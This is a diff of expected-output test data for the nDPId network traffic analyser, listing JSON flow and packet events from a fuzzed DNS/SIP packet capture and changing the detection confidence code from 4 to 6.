port"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":395,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470200673,"flow_last_seen":1120470200673,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470394622,"l3_proto":"ip4","src_ip":"192.22.1.2","dst_ip":"192.168.1.1","src_port":2760,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":395,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470202676,"flow_last_seen":1120470208684,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470394622,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2760,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -721,43 +721,43 @@ 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":397,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":1120470399719,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470399719,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOazwAJXMASxHAqAECwKgB\/wD+AIkAOltshS8BFAABAAAAAAAAIEVGRURFSkZQRUVFUEVOJXMASkVPQ0FDQUNBQ0FDQUJNAAAgAAE="} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":398,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470402624,"flow_last_seen":1120470402624,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470402624,"l3_proto":"ip4","src_ip":"192.168.33.2","dst_ip":"192.168.1.1","src_port":2782,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":398,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":1,"flow_last_seen":1120470402624,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470402624,"pkt":"ADBUADRWAODtAW69CABFAABEaz0AAIARTBjAqCECwKgBAQreADUAMNT8T+QAAAABAAAAAAAAQTEBMAEwAzEyNwdpbi1hZGQgBGFycGEAAAwAAQ=="} -00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":398,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470402624,"flow_last_seen":1120470402624,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470402624,"l3_proto":"ip4","src_ip":"192.168.33.2","dst_ip":"192.168.1.1","src_port":2782,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":398,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470402624,"flow_last_seen":1120470402624,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470402624,"l3_proto":"ip4","src_ip":"192.168.33.2","dst_ip":"192.168.1.1","src_port":2782,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":399,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470402625,"flow_last_seen":1120470402625,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470402625,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2782,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":399,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":1,"flow_last_seen":1120470402625,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470402625,"pkt":"AeDtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1Ct4AR7d4T+SAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":399,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470402625,"flow_last_seen":1120470402625,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470402625,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2782,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":399,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470402625,"flow_last_seen":1120470402625,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470402625,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2782,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":400,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470402627,"flow_last_seen":1120470402627,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1120470402627,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":400,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":1,"flow_last_seen":1120470402627,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":47,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":47,"pkt_l4_len":13,"thread_ts_msec":1120470402627,"pkt":"ADBUADRWAODtAW69CABFAAAhaz4AAIARF87AqAEG1PIhIxPEE8QADcBLICAgICA="} 00198{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":401,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":2566,"global_ts_msec":1120470407625} 00364{"packet_event_id":1,"packet_event_name":"packet","packet_id":401,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":2566,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1120470402627,"pkt":"AODtAW5nADBUADRWCgYAAQgABgQAAQAwVAA0VsCoAQEAAAAAAADAqAECiGQRAPY3AArAIQkOAAjPO\/nN"} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":403,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470216686,"flow_last_seen":1120470216688,"flow_idle_time":200000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1120470402627,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2761,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":403,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470216686,"flow_last_seen":1120470216688,"flow_idle_time":200000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1120470402627,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2761,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":403,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470216783,"flow_last_seen":1120470219780,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470402627,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2762,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":403,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470414647,"flow_last_seen":1120470414647,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470414647,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":1,"flow_last_seen":1120470414647,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470414647,"pkt":"ADBUADRWAODtAW69CABFAABIa0oAAIARTAfAqAECwKgBAQrfADUANOABSeQBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAQhAAE="} -00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":403,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470414647,"flow_last_seen":1120470414647,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470414647,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1057,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":403,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470414647,"flow_last_seen":1120470414647,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470414647,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1057,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":404,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":2,"flow_last_seen":1120470415643,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470415643,"pkt":"ADBUJXMAAODtAW69CABFAABIa0sAAIARTAbAqAECwKgBAQrfADUANOABSeQBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":404,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470414647,"flow_last_seen":1120470415643,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470415643,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":404,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470414647,"flow_last_seen":1120470415643,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470415643,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":405,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1120470417645} 00400{"packet_event_id":1,"packet_event_name":"packet","packet_id":405,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470415643,"pkt":"ADBUADRWAOCqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":406,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470419648,"flow_last_seen":1120470419648,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470419648,"l3_proto":"ip4","src_ip":"0.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":1,"flow_last_seen":1120470419648,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470419648,"pkt":"ADBUADRWAODtAW69CABFAABIa00AAIARJXMAqAECwKgBAQrfADUANOABSeQBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":406,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470419648,"flow_last_seen":1120470419648,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470419648,"l3_proto":"ip4","src_ip":"0.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":406,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470419648,"flow_last_seen":1120470419648,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470419648,"l3_proto":"ip4","src_ip":"0.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":407,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":3,"flow_last_seen":1120470423654,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470423654,"pkt":"ADBUADRWAODtAW69CABFAABIa04AAIARTAPAqAECwKgBAQrfADUANOABSeQBAAIBAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00920{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":407,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470414647,"flow_last_seen":1120470423654,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470423654,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00920{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":407,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470414647,"flow_last_seen":1120470423654,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470423654,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00614{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":408,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470236795,"flow_last_seen":1120470236795,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470423654,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00599{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":408,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470236795,"flow_last_seen":1120470236795,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470423654,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":408,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470233792,"flow_last_seen":1120470233792,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470423654,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2763,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":408,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1120470233796,"flow_last_seen":1120470242804,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470423654,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2764,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":408,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470233792,"flow_last_seen":1120470233792,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470423654,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2763,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":408,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1120470233796,"flow_last_seen":1120470242804,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470423654,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2764,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":408,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470431656,"flow_last_seen":1120470431656,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470431656,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2784,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 